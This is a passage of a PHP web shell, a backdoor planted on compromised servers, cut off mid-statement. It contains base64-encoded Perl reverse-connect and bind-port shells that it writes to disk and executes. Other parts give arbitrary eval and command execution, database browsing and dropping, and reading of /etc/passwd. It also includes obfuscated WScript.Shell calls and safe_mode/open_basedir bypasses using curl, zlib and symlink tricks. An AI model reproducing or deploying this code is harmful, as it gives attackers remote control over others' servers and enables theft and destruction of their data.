  503. $zipfile->add_file($fileContents, $put_into.$file);
  504. } elseif ($file != '.' and $file != '..' and is_dir($directory.$file)) {
  505. $zipfile->add_dir($put_into.$file.'/');
  506. get_files_from_folder($directory.$file.'/', $put_into.$file.'/');
  507. }
  508. }
  509. }
  510. closedir($handle);
  511. }
  512. $datedl=date("y-m-d");
  513. get_files_from_folder($dlfolder,'');
  514. header("Content-Disposition: attachment; filename=" . $_GET['dirname']."-".$datedl.".zip");
  515. header("Content-Type: application/download");
  516. header("Content-Length: " . strlen($zipfile -> file()));
  517. flush();
  518. echo $zipfile -> file();
  519. $filename = $_GET['dirname']."-".$datedl.".zip";
  520. $fd = fopen ($filename, "wb");
  521. $out = fwrite ($fd, $zipfile -> file());
  522. fclose ($fd);
  523. }
  524. if ($_REQUEST['cdirname']){
  525. if(mkdir($_REQUEST['cdirname'],"0777")){alert("Directory Created !");}else{alert("Permission Denied !");}}
  526. function bcn($ipbc,$pbc){
  527. $bcperl="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3
  528. NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRwb3J0ID0gJEFSR1Zb
  529. MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIHNjcmlw
  530. dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIlsrXSBDb25uZWN0aW5n
  531. IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyBZb3UgY2FuIGNo
  532. YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFN
  533. LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKaWYgKCFjb25uZWN0
  534. KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGll
  535. KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOwog
  536. IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOwogIGV4
  537. ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow==";
  538. $opbc=fopen("bcc.pl","w");
  539. fwrite($opbc,base64_decode($bcperl));
  540. fclose($opbc);
  541. system("perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
  542. }
  543. function wbp($wb){
  544. $wbp="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3Rj
  545. cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsKc2V0c29j
  546. a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTsKYmlu
  547. ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxpc3RlbihTRVJWRVIs
  548. IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3Nl
  549. IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERPVVQsICI+JkNMSUVO
  550. VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV4ZScpOwpjbG9zZShT
  551. VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g";
  552. $opwb=fopen("wbp.pl","w");
  553. fwrite($opwb,base64_decode($wbp));
  554. fclose($opwb);
  555. echo getcwd();
  556. system("perl wbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
  557. }
  558. function lbp($wb){
  559. $lbp="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF07JHByb3RvPWdldHByb3Rv
  560. YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZFUiwgUEZfSU5FVCwg
  561. U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JF
  562. VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4oJHBvcnQsIElO
  563. QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7ICRwYWRkciA9IGFjY2Vw
  564. dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4mQ0xJRU5UIik7
  565. b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTElFTlQiKTtzeXN0ZW0o
  566. Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVERFUlIpO30g";
  567. $oplb=fopen("lbp.pl","w");
  568. fwrite($oplb,base64_decode($lbp));
  569. fclose($oplb);
  570. system("perl lbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
  571. }
  572.  
  573. if($_REQUEST['portbw']){
  574. wbp($_REQUEST['portbw']);
  575.  
  576. }if($_REQUEST['portbl']){
  577. lbp($_REQUEST['portbl']);
  578. }
  579. if($_REQUEST['ipcb'] && $_REQUEST['portbc']){
  580. bcn($_REQUEST['ipcb'],$_REQUEST['portbc']);
  581.  
  582. }
  583.  
  584. if($_REQUEST['do']=="bc"){
  585. echo $head.$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Back Connect >>>>>><br>Ip Address : <input name=ipcb value=".$_SERVER['REMOTE_ADDR'] ."> Port : <input name=portbc value=5555><br><input type=submit value=Connect></form>".$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Windows Bind Port >>>>>><br>Port : <input name=portbw value=5555><br><input type=submit value=Connect></form>".$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Linux Bind Port >>>>>><br>Port : <input name=portbl value=5555><br><input type=submit value=Connect></form>".$end;exit;
  586.  
  587. }
  588. function copyf($file1,$file2,$filename){
  589. global $slash;
  590. $fpc = fopen($file1, "rb");
  591. $source = '';
  592. while (!feof($fpc)) {
  593. $source .= fread($fpc, 8192);
  594. }
  595. fclose($fpc);
  596. $opt = fopen($file2.$slash.$filename, "w");
  597. fwrite($opt, $source);
  598. fclose($opt);
  599. }
  600. if ($_REQUEST['copyname'] && $_REQUEST['cpyto']){
  601. if(is_writable($_REQUEST['cpyto'])){
  602. echo $_REQUEST['address'];
  603. copyf($_REQUEST['address'].$slash.$_REQUEST['copyname'],$_REQUEST['cpyto'],$_REQUEST['copyname']);
  604. }else{alert("Permission Denied !");}}
  605. if($_REQUEST['cfilename']){
  606.  
  607. echo $head.$formp.$nowaddress.'<p align="center"><b>Create File</b><br><textarea rows="19" name="nf4cs" cols="87"></textarea><br><input value="'.$_REQUEST['cfilename'].'" name=nf4c size=50><br><input type=submit value=" Create "></form>'.$end;exit;
  608. }
  609.  
  610. if($_REQUEST['nf4c'] && $_REQUEST['nf4cs']){
  611. if($ofile4c=fopen($_REQUEST['nf4c'],"w")){
  612. fwrite($ofile4c,$_REQUEST['nf4cs']);
  613. fclose($ofile4c);
  614. alert("File Saved !");}else{alert("Permission Denied !");}}
  615.  
  616. function sqlclienT(){
  617. global $t,$errorbox,$et,$hcwd;
  618. if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){
  619. $server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY'];
  620. $db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB'];
  621. $_SESSION[server]=$_REQUEST['serveR'];$_SESSION[type]=$_REQUEST['typE'];$_SESSION[pass]=$_REQUEST['pasS'];$_SESSION[user]=$_REQUEST['useR'];
  622.  
  623. }
  624.  
  625. if (isset ($_GET[select_db])){
  626. $getdb=$_GET[select_db];
  627. $_SESSION[db]=$getdb;
  628. $query="SHOW TABLES";
  629. $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
  630. }
  631. elseif (isset ($_GET[select_tbl])){
  632. $tbl=$_GET[select_tbl];
  633. $_SESSION[tbl]=$tbl;
  634. $query="SELECT * FROM `$tbl`";
  635. $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
  636. }
  637. elseif (isset ($_GET[drop_db])){
  638. $getdb=$_GET[drop_db];
  639. $_SESSION[db]=$getdb;
  640. $query="DROP DATABASE `$getdb`";
  641. querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'',$query);
  642. $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'','SHOW DATABASES');
  643. }
  644. elseif (isset ($_GET[drop_tbl])){
  645. $getbl=$_GET[drop_tbl];
  646. $query="DROP TABLE `$getbl`";
  647. querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
  648. $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],'SHOW TABLES');
  649. }
  650. elseif (isset ($_GET[drop_row])){
  651. $getrow=$_GET[drop_row];
  652. $getclm=$_GET[clm];
  653. $query="DELETE FROM `$_SESSION[tbl]` WHERE $getclm='$getrow'";
  654. $tbl=$_SESSION[tbl];
  655. querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
  656. $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],"SELECT * FROM `$tbl`");
  657. }
  658. else
  659. $res=querY($type,$server,$user,$pass,$db,$query);
  660.  
  661. if($res){
  662. $res=htmlspecialchars($res);
  663. $row=array ();
  664. $title=explode('[+][+][+]',$res);
  665. $trow=explode('[-][-][-]',$title[1]);
  666. $row=explode('|+|+|+|+|+|',$title[0]);
  667. $data=array();
  668. $field=$trow[count($trow)-2];
  669. if (strstr($trow[0],'Database')!='')
  670. $obj='db';
  671. elseif (substr($trow[0],0,6)=='Tables')
  672. $obj='tbl';
  673. else
  674. $obj='row';
  675. $i=0;
  676. foreach ($row as $a){
  677. if($a!='')
  678. $data[$i++]=explode('|-|-|-|-|-|',$a);
  679. }
  680.  
  681. echo "<table border=1 bordercolor='#C6C6C6' cellpadding='2' bgcolor='EAEAEA' width='100%' style='border-collapse: collapse'><tr>";
  682. foreach ($trow as $ti)
  683. echo "<td bgcolor='F2F2F2'>$ti</td>";
  684. echo "</tr>";
  685. $j=0;
  686. while ($data[$j]){
  687. echo "<tr>";
  688. foreach ($data[$j++] as $dr){
  689. echo "<td>";
  690. if($obj!='row') echo "<a href='$_SERVER[PHP_SELF]?do=db&select_$obj=$dr'>";
  691. echo $dr;
  692. if($obj!='row') echo "</a>";
  693. echo "</td>";
  694. }
  695. echo "<td><a href='$_SERVER[PHP_SELF]?do=db&drop_$obj=$dr";
  696. if($obj=='row')
  697. echo "&clm=$field";
  698. echo "'>Drop</a></td></tr>";
  699. }
  700. echo "</table><br>";
  701.  
  702. }
  703.  
  704.  
  705.  
  706.  
  707.  
  708. if(empty($_REQUEST['typE']))$_REQUEST['typE']='';
  709. echo "<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'><table border='1' width='400' style='border-collapse: collapse' id='table1' bordercolor='#C6C6C6' cellpadding='2'><tr><td width='400' colspan='2' bgcolor='#F2F2F2'><p align='center'><b><font face='Arial' size='2' color='#433934'>Connect to Database</font></b></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>DB Type:</font></td><td width='250' bgcolor='#EAEAEA'><select name=typE><option valut=MySQL onClick='document.client.serveR.disabled = false;' ";
  710. if ($_REQUEST['typE']=='MySQL')echo 'selected';
  711. echo ">MySQL</option><option valut=MSSQL onClick='document.client.serveR.disabled = false;' ";
  712. if ($_REQUEST['typE']=='MSSQL')echo 'selected';
  713. echo ">MSSQL</option><option valut=Oracle onClick='document.client.serveR.disabled = true;' ";
  714. if ($_REQUEST['typE']=='Oracle')echo 'selected';
  715. echo ">Oracle</option><option valut=PostgreSQL onClick='document.client.serveR.disabled = false;' ";
  716. if ($_REQUEST['typE']=='PostgreSQL')echo 'selected';
  717. echo ">PostgreSQL</option><option valut=DB2 onClick='document.client.serveR.disabled = false;' ";
  718. if ($_REQUEST['typE']=='DB2')echo 'selected';
  719. echo ">IBM DB2</option></select></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Server Address:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
  720. if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'localhost';
  721. echo "' name=serveR size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Username:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text name=useR value='";
  722. if (!empty($_REQUEST['useR'])) echo htmlspecialchars($_REQUEST['useR']);else echo 'root';
  723. echo "' size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Password:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
  724. if (isset($_REQUEST['pasS'])) echo htmlspecialchars($_REQUEST['pasS']);else echo '123';
  725. echo "' name=pasS size=35></td></tr><tr><td width='400' colspan='2' bgcolor='#F2F2F2'><p align='center'><b><font face='Arial' size='2' color='#433934'>Submit a Query</font></b></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>DB Name:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
  726. if (!empty($_REQUEST['dB'])) echo htmlspecialchars($_REQUEST['dB']);
  727. echo "' name=dB size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Query:</font></td><td width='250' bgcolor='#EAEAEA'><textarea name=querY rows=5 cols=27>";
  728. if (!empty($_REQUEST['querY'])) echo htmlspecialchars(($_REQUEST['querY']));else echo 'SHOW DATABASES';
  729. echo "</textarea></td></tr><tr><td width='400' colspan='2' bgcolor='#EAEAEA'>$hcwd<input class=buttons type=submit value='Submit' style='float: right'></td></tr></table></form>$et</center>";
  730. }
  731.  
  732.  
  733. function querY($type,$host,$user,$pass,$db='',$query){
  734. $res='';
  735. switch($type){
  736. case 'MySQL':
  737. if(!function_exists('mysql_connect'))return 0;
  738. $link=mysql_connect($host,$user,$pass);
  739. if($link){
  740. if(!empty($db))mysql_select_db($db,$link);
  741. $result=mysql_query($query,$link);
  742. if ($result!=1){
  743. while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
  744. $res.='[+][+][+]';
  745. for($i=0;$i<mysql_num_fields($result);$i++)
  746. $res.=mysql_field_name($result,$i).'[-][-][-]';
  747. }
  748. mysql_close($link);
  749. return $res;
  750. }
  751. break;
  752. case 'MSSQL':
  753. if(!function_exists('mssql_connect'))return 0;
  754. $link=mssql_connect($host,$user,$pass);
  755. if($link){
  756. if(!empty($db))mssql_select_db($db,$link);
  757. $result=mssql_query($query,$link);
  758. while($data=mssql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
  759. $res.='[+][+][+]';
  760. for($i=0;$i<mssql_num_fields($result);$i++)
  761. $res.=mssql_field_name($result,$i).'[-][-][-]';
  762. mssql_close($link);
  763. return $res;
  764. }
  765. break;
  766. case 'Oracle':
  767. if(!function_exists('ocilogon'))return 0;
  768. $link=ocilogon($user,$pass,$db);
  769. if($link){
  770. $stm=ociparse($link,$query);
  771. ociexecute($stm,OCI_DEFAULT);
  772. while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
  773. $res.='[+][+][+]';
  774. for($i=0;$i<oci_num_fields($stm);$i++)
  775. $res.=oci_field_name($stm,$i).'[-][-][-]';
  776. return $res;
  777. }
  778. break;
  779. case 'PostgreSQL':
  780. if(!function_exists('pg_connect'))return 0;
  781. $link=pg_connect("host=$host dbname=$db user=$user password=$pass");
  782. if($link){
  783. $result=pg_query($link,$query);
  784. while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
  785. $res.='[+][+][+]';
  786. for($i=0;$i<pg_num_fields($result);$i++)
  787. $res.=pg_field_name($result,$i).'[-][-][-]';
  788. pg_close($link);
  789. return $res;
  790. }
  791. break;
  792. case 'DB2':
  793. if(!function_exists('db2_connect'))return 0;
  794. $link=db2_connect($db,$user,$pass);
  795. if($link){
  796. $result=db2_exec($link,$query);
  797. while($data=db2_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
  798. $res.='[+][+][+]';
  799. for($i=0;$i<db2_num_fields($result);$i++)
  800. $res.=db2_field_name($result,$i).'[-][-][-]';
  801. db2_close($link);
  802. return $res;
  803. }
  804. break;
  805. }
  806. return 0;
  807. }
  808. function bywsym($file){
  809. if(!function_exists('symlink')){echo "Function Symlink Not Exist";}
  810.  
  811. if(!is_writable("."))
  812. die("not writable directory");
  813. $level=0;
  814. for($as=0;$as<$fakedep;$as++){
  815. if(!file_exists($fakedir))
  816. mkdir($fakedir);
  817. chdir($fakedir);
  818. }
  819. while(1<$as--) chdir("..");
  820. $hardstyle = explode("/", $file);
  821. for($a=0;$a<count($hardstyle);$a++){
  822. if(!empty($hardstyle[$a])){
  823. if(!file_exists($hardstyle[$a]))
  824. mkdir($hardstyle[$a]);
  825. chdir($hardstyle[$a]);
  826. $as++;
  827. }}
  828. $as++;
  829. while($as--)
  830. chdir("..");
  831. @rmdir("fakesymlink");
  832. @unlink("fakesymlink");
  833. @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
  834. while(1)
  835. if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
  836. else $num++;
  837. @unlink("fakesymlink");
  838. mkdir("fakesymlink");
  839. }
  840. function bypcu($file){
  841. $level=0;
  842.  
  843. if(!file_exists("file:"))
  844. mkdir("file:");
  845. chdir("file:");
  846. $level++;
  847.  
  848. $hardstyle = explode("/", $file);
  849.  
  850. for($a=0;$a<count($hardstyle);$a++){
  851. if(!empty($hardstyle[$a])){
  852. if(!file_exists($hardstyle[$a]))
  853. mkdir($hardstyle[$a]);
  854. chdir($hardstyle[$a]);
  855. $level++;
  856. }
  857. }
  858.  
  859. while($level--) chdir("..");
  860.  
  861. $ch = curl_init();
  862.  
  863. curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
  864.  
  865. echo '<FONT COLOR="RED"> <textarea rows="40" cols="120">';
  866.  
  867. if(FALSE==curl_exec($ch))
  868. die('>Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
  869.  
  870. echo ' </textarea> </FONT>';
  871.  
  872. curl_close($ch);
  873. }
  874. if ($_REQUEST['bypcu']){
  875. bypcu($_REQUEST['bypcu']);
  876. }
  877. if($_REQUEST['do']=="bypasscmd"){
  878. if($_POST['bycw']){
  879. echo $_POST['bycw'];
  880. $wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll');
  881. $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['bycw']."");
  882. $stdout = $exec->StdOut();
  883. $stcom = $stdout->ReadAll();}
  884.  
  885. echo $head.'<p align="center"><textarea rows="13" name="showbsd" cols="77">';if($_POST['byws']){passthru("\\".$_POST['byws']);} echo $stcom.'</textarea><hr><center>Bypass Safe_Mode And Disable_Functions In Windows Server<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'<input type=hidden value="bypasscmd" name=do>Command </font></td><td width="750"><input name=bycw size=50><input type=submit value ="eXecute"></form></td></tr></table>Bypass Safe_Mode Windows Server<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Command </font></td><td width="750"><input name=byws size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypasscmd"></form></td></tr></table>'.$end;exit;;
  886. }
  887. if($_REQUEST['do']=="bypassdir"){
  888. if($_POST['byoc']){
  889. if(copy("compress.zlib://".$_POST['byoc'], getcwd()."/"."peji.txt")){
  890. $bopens="Bypass Succesfull Plz Read File Peji.txt In This Folder";
  891. }else{$bopens="Can Not Bypass This";}
  892. }
  893. if($_POST['byfc']){
  894. curl_init("file:///".$_POST['byfc']."\x00/../../../../../../../../../../../../".__FILE__);
  895. $debfc=curl_exec($ch);
  896. }
  897. if($_POST['byetc']){
  898. for($bye=0;$bye<40000;$bye++){
  899. $sbep =$sbep. posix_getpwuid($bye);
  900. }}
  901. if($_POST['byfc9']){
  902. echo "not sucsfull";
  903. }
  904. if($_REQUEST['bysyml']){
  905. $file=$_REQUEST['bysyml'];
  906. bywsym($file);
  907. }
  908. echo $head.'<p align="center"><textarea rows="13" name="showbsd" cols="77">';if($_POST['byws']){passthru("\\".$_POST['byws']);}if(isset($sbep)){for($fbe=0;$fbe<count($sbep);$fbe++){echo $sbep[$fbe];}} if(isset($debfc)){} echo $bopens.'</textarea><hr><center>Bypass Safe_Mode And Open_basedir With Bug Copy(Zlib) Worked In 4.4.2 .. 5.1.2<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right">'.$formp.'<input type=hidden value="bypassdir" name=do><font face="Tahoma" style="font-size: 10pt; font-weight:700">Address File </font></td><td width="750"><input name=byoc size=50 ><input type=submit value ="read"></form></td></tr></table><hr>Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.4.2 and 5.1.4<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Address File </font></td><td width="750"><input name=byfc size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypassdir"></form></td></tr></table><hr>Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.X ... 5.2.9<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Address File </font></td><td width="750"><input name=byfc9 size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypassdir"></form></td></tr></table><hr>Bypass /Etc/Passwd<br>'.$formp.'<input type=submit value ="Read Passwd"><input type=hidden name=byetc value="lol"><input type=hidden name=do value="bypassdir"></form><hr>Bypass With ini_restore'.$formp.'<input type=submit value ="Read File"><input name=rfili value="Pejijon" type=hidden><input type=hidden name=do value="bypassdir"></form><hr>Bypass With Symlink Worked In 5.x.x 5.2.11 With Bug Symlink<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'</font></td><td width="750"><input name=bysyml size=50><input type=submit value ="Read File"><input type=hidden name=do value="bypassdir"><input name=rfili value="Pejijon" type=hidden></form></td></tr></table><hr>'.$formp.'Bypass Safe And Open_basedir With Bug Curl Worked In 4.x.x ... 5.2.9<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'</font></td><td width="750"><input name=bypcu size=50><input type=submit value ="Read File"><input type=hidden name=do value="bypassdir"></form></td></tr></table>'.$end;exit;;
  909.  
  910.  
  911.  
  912.  
  913. }
  914. function printdrive(){
  915. global $slash;
  916. foreach (range("A","Z") as $tempdrive) {
  917. if (is_dir($tempdrive.":".$slash)){
  918. $adri=$tempdrive.":".$slash;
  919. $drivea=$drivea.'<a href="?address='.$adri.'"><font size=1>'.$tempdrive.':'.$slash.' </a></font>';
  920. }
  921. }
  922. return $drivea;
  923. }
  924. if($_POST['nameren'] && $_POST['addressren']){
  925. if(is_writable($_REQUEST['addressren'])){
  926.  
  927. rename($_POST['addressren'],$_POST['nameren']);alert("Rename Successful !");
  928. }else{alert("Permission Denied !");}
  929. }
  930. if($_GET['do']=="delete"){
  931.  
  932. if ($_GET['type']=="dir"){
  933. if(is_writable($_REQUEST['address'])){
  934. $dir=$_GET['address'].$_GET['filename'];
  935. deleteDirectory($dir);
  936. alert("Deleted Successful !");
  937. }else{alert("Permission Denied !");}
  938. }elseif($_GET['type']=="file"){
  939. if(is_writable($_GET['address'].$_GET['filename'])){
  940. unlink($_GET['address'].$_GET['filename']);alert("Deleted Successful !");
  941. }else{alert("Permission Denied !");}
  942. }
  943. }
  944. if($_POST['fedit'] && $_POST['namefe']){
  945. if(is_writable($_REQUEST['address'])){
  946.  
  947.  
  948. $opensave=fopen($_POST['address'].$slash.$_POST['namefe'],"w");
  949. fwrite($opensave,html_entity_decode($_POST['fedit']));
  950. fclose($opensave);alert("File Saved Successful !");
  951. }else{alert("Permission Denied !");}
  952. }
  953. if ($_POST['evalsource']){
  954.  
  955. eval($_POST['evalsource']);
  956. }
  957. if($_GET['do']=="eval"){
  958. echo $head.$formp.$nowaddress.'<p align="center"><textarea rows="19" name="evalsource" cols="87"></textarea><br><input type=submit value=" eXecute "></form></p>'.$end;exit;
  959. }
  960. if($_GET['do']=="info"){
  961.  
  962. if(ini_get('register_globals')){
  963. $registerg="Enable";
  964. }else{
  965. $registerg="disable";
  966. }
  967. if(extension_loaded('curl')){
  968. $curls="Enable";
  969. }else{
  970. $curls="disable";
  971. }
  972. if(@function_exists('mysql_connect')){
  973. $db_on = "Mysql : On";
  974. };
  975. if(@function_exists('mssql_connect')){
  976. $db_on = "Mssql : On";
  977. };
  978. if(@function_exists('pg_connect')){
  979. $db_on = "PostgreSQL : On";
  980. };if(@function_exists('ocilogon')){
  981. $db_on = "Oracle : On";
  982. };
  983.  
  984. echo $head."<font face='Tahoma' size='2'>Operating System : ".php_uname()."<br>Server Name : ".$_SERVER['HTTP_HOST']."<br>Disable_Functions : ".$disablef."<br>Safe_Mode : ".$safe_modes."<br>Openbase_dir : ".ini_get('openbase_dir')."<br>Php Version : ".phpversion()."<br>Free Space : ".sizee(disk_free_space("/"))."<br>Total Space : ".sizee(disk_total_space("/"))."<br>Register_Globals : ".$registerg."<br>Curl : ".$curls."<br>Database ".$db_on."<br>Server Name : ".$_SERVER['HTTP_HOST']."<br>Admin Server : ".$_SERVER['SERVER_ADMIN'].$end;
  985. exit;
  986. }
  987. if ($_GET['do']=="cmd"){
  988. echo $head.'
  989. <form method=get action="'.$me.'">
  990. <p align="center">
  991. <textarea rows="19" name="S1" cols="87">';
  992. if (strlen($_GET['command'])>1 && $_GET['execmethod']!="popen"){
  993. echo $_GET['execmethod']($_GET['command']);}
  994. if (strlen($_POST['command'])>1 && $_POST['execmethod']!="popen"){
  995. echo $_POST['execmethod']($_POST['command']);}
  996.  
  997. if (strlen($_GET['command'])>1 && $_GET['execmethod']=="popen"){
  998. popen($_GET['command'],"r");}
  999.  
  1000. echo'</textarea></p><p align="center">
  1001. <input type=hidden name="do" size="50" value="cmd"> <input type="text" name="command" size="50"><select name=execmethod>
  1002. <option value="system">System</option> <option value="exec">Exec</option> <option value="passthru">Passthru</option><option value="popen">popen</option>
  1003. </select><input type="submit" value="eXecute">
  1004. </p></form>'.$end;exit;}
  1005. if ($_GET['do']=="symlink"){
  1006. echo $head.'
  1007. <form method=post action="'.$me.'">
  1008. <p align="center">
  1009. SymLink With PHP<br><input name=ad1syp size=50> TO <input value="'.getcwd().$slash."symlink.txt".'" name=ad2syp size=50><br><input type=submit value=SymLink!><hr><p align="center"></form>
  1010. <form method=post action="'.$me.'"><p align="center">
  1011.  
  1012. SymLink With OS : <br><input name=ad1syc size=50> TO <input value="'.getcwd().$slash."symlink.txt".'" name=ad2syc size=50><br><input type=submit value=SymLink!>
  1013. </p></form>'.$end;exit;}
  1014. if ($_POST['ad1syp'] && $_POST['ad2syp']){
  1015. if (symlink($_POST['ad1syp'],$_POST['ad2syp'])){
  1016. alert("Symlink Worked !");
  1017. }else{
  1018. alert("Symlink Not Worked !");
  1019. }}
  1020. if ($_POST['ad1syc'] && $_POST['ad2syc']){
  1021. if (system('ls -s '.$_POST['ad1syc']." ".$_POST['ad2syc'])){
  1022. alert("Symlink Worked !");
  1023. }else{alert("Symlink Not Worked !");}
  1024. }
  1025. if ($_GET['do']=="d0slocal"){
  1026. echo $head.'
